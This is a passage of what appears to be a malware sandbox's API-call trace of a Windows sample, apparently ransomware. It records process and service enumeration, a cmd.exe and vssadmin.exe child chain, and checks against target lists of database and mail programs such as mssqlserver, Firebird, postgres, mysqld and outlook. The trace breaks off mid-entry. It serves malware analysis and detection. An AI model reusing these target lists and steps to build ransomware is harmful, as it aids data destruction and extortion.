lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0057.812] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0057.812] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0057.813] lstrlenW (lpString="ivttvf.exe") returned 10 [0057.813] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0057.814] lstrlenW (lpString="cmd.exe") returned 7 [0057.814] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0057.814] lstrlenW (lpString="conhost.exe") returned 11 [0057.814] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0057.815] lstrlenW (lpString="vssadmin.exe") returned 12 [0057.815] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0057.816] lstrlenW (lpString="VSSVC.exe") returned 9 [0057.816] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.817] lstrlenW (lpString="svchost.exe") returned 11 [0057.817] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0057.817] CloseHandle (hObject=0x164) returned 1 [0057.817] Sleep (dwMilliseconds=0x1f4) [0059.118] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5ef968 [0059.119] EnumServicesStatusExW (in: hSCManager=0x5ef968, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0059.119] GetLastError () returned 0xea [0059.119] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x12c6) returned 0x662fe8 [0059.119] EnumServicesStatusExW (in: hSCManager=0x5ef968, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x662fe8, cbBufSize=0x12c6, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x662fe8, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0059.120] CloseServiceHandle (hSCObject=0x5ef968) returned 1 [0059.120] lstrlenW (lpString="Appinfo") returned 7 [0059.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0059.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0059.120] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0059.120] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0059.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0059.120] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0059.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0059.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0059.120] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0059.120] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0059.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0059.120] lstrlenW (lpString="AudioSrv") returned 8 [0059.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0059.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0059.120] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0059.120] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0059.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0059.120] lstrlenW (lpString="BFE") returned 3 [0059.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0059.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0059.120] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0059.120] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0059.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0059.120] lstrlenW (lpString="CryptSvc") returned 8 [0059.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0059.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0059.120] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0059.121] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0059.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0059.121] lstrlenW (lpString="CscService") returned 10 [0059.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0059.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0059.121] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0059.121] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0059.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0059.121] lstrlenW (lpString="DcomLaunch") returned 10 [0059.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0059.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0059.121] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0059.121] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0059.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0059.121] lstrlenW (lpString="Dhcp") returned 4 [0059.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0059.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0059.121] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0059.121] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0059.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0059.121] lstrlenW (lpString="Dnscache") returned 8 [0059.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0059.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0059.121] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0059.121] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0059.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0059.121] lstrlenW (lpString="DPS") returned 3 [0059.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0059.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0059.121] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0059.121] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0059.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0059.122] lstrlenW (lpString="eventlog") returned 8 [0059.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0059.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0059.122] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0059.122] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0059.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0059.122] lstrlenW (lpString="EventSystem") returned 11 [0059.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0059.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0059.122] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0059.122] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0059.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0059.122] lstrlenW (lpString="gpsvc") returned 5 [0059.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0059.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0059.122] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0059.122] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0059.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0059.122] lstrlenW (lpString="iphlpsvc") returned 8 [0059.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0059.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0059.122] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0059.122] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0059.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0059.122] lstrlenW (lpString="LanmanServer") returned 12 [0059.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0059.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0059.122] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0059.122] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0059.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0059.122] lstrlenW (lpString="LanmanWorkstation") returned 17 [0059.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0059.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0059.123] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0059.123] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0059.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0059.123] lstrlenW (lpString="lmhosts") returned 7 [0059.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0059.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0059.123] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0059.123] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0059.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0059.123] lstrlenW (lpString="MMCSS") returned 5 [0059.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0059.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0059.123] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0059.123] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0059.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0059.123] lstrlenW (lpString="MpsSvc") returned 6 [0059.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0059.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0059.123] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0059.123] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0059.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0059.123] lstrlenW (lpString="Netman") returned 6 [0059.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0059.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0059.123] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0059.123] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0059.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0059.123] lstrlenW (lpString="netprofm") returned 8 [0059.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0059.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0059.123] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0059.123] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0059.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0059.124] lstrlenW (lpString="NlaSvc") returned 6 [0059.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0059.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0059.124] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0059.124] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0059.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0059.124] lstrlenW (lpString="nsi") returned 3 [0059.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0059.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0059.124] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0059.124] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0059.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0059.124] lstrlenW (lpString="PcaSvc") returned 6 [0059.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0059.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0059.124] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0059.124] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0059.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0059.124] lstrlenW (lpString="PlugPlay") returned 8 [0059.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0059.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0059.124] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0059.124] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0059.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0059.124] lstrlenW (lpString="Power") returned 5 [0059.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0059.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0059.124] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0059.124] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0059.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0059.124] lstrlenW (lpString="ProfSvc") returned 7 [0059.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0059.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0059.125] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0059.125] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0059.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0059.125] lstrlenW (lpString="RpcEptMapper") returned 12 [0059.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0059.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0059.125] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0059.125] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0059.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0059.125] lstrlenW (lpString="RpcSs") returned 5 [0059.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0059.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0059.125] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0059.125] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0059.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0059.125] lstrlenW (lpString="SamSs") returned 5 [0059.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0059.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0059.125] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0059.125] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0059.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0059.125] lstrlenW (lpString="Schedule") returned 8 [0059.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0059.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0059.125] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0059.125] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0059.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0059.125] lstrlenW (lpString="SENS") returned 4 [0059.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0059.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0059.125] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0059.125] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0059.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0059.126] lstrlenW (lpString="ShellHWDetection") returned 16 [0059.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0059.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0059.126] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0059.126] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0059.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0059.126] lstrlenW (lpString="Spooler") returned 7 [0059.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0059.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0059.126] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0059.126] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0059.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0059.126] lstrlenW (lpString="swprv") returned 5 [0059.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0059.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0059.126] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0059.126] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0059.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0059.126] lstrlenW (lpString="SysMain") returned 7 [0059.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0059.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0059.126] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0059.126] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0059.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0059.126] lstrlenW (lpString="Themes") returned 6 [0059.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0059.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0059.126] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0059.126] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0059.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0059.126] lstrlenW (lpString="TrkWks") returned 6 [0059.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0059.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0059.127] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0059.127] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0059.127] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0059.127] lstrlenW (lpString="UxSms") returned 5 [0059.127] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0059.127] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0059.127] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0059.127] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0059.127] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0059.127] lstrlenW (lpString="VSS") returned 3 [0059.127] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0059.127] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0059.127] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0059.127] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0059.127] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0059.127] lstrlenW (lpString="WdiServiceHost") returned 14 [0059.127] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0059.127] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0059.127] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0059.127] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0059.127] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0059.127] lstrlenW (lpString="WdiSystemHost") returned 13 [0059.127] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0059.127] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0059.127] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0059.127] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0059.127] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0059.127] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0059.127] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0059.127] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0059.127] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0059.127] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0059.127] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0059.127] lstrlenW (lpString="Winmgmt") returned 7 [0059.128] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0059.128] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0059.128] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0059.128] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0059.128] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0059.128] lstrlenW (lpString="WPDBusEnum") returned 10 [0059.128] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0059.128] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0059.128] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0059.128] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0059.128] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0059.128] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x662fe8 | out: hHeap=0x570000) returned 1 [0059.128] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20c [0059.130] Process32FirstW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0059.131] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0059.132] lstrlenW (lpString="System") returned 6 [0059.132] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0059.132] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0059.132] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0059.132] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0059.132] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0059.132] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0059.132] lstrcmpiW 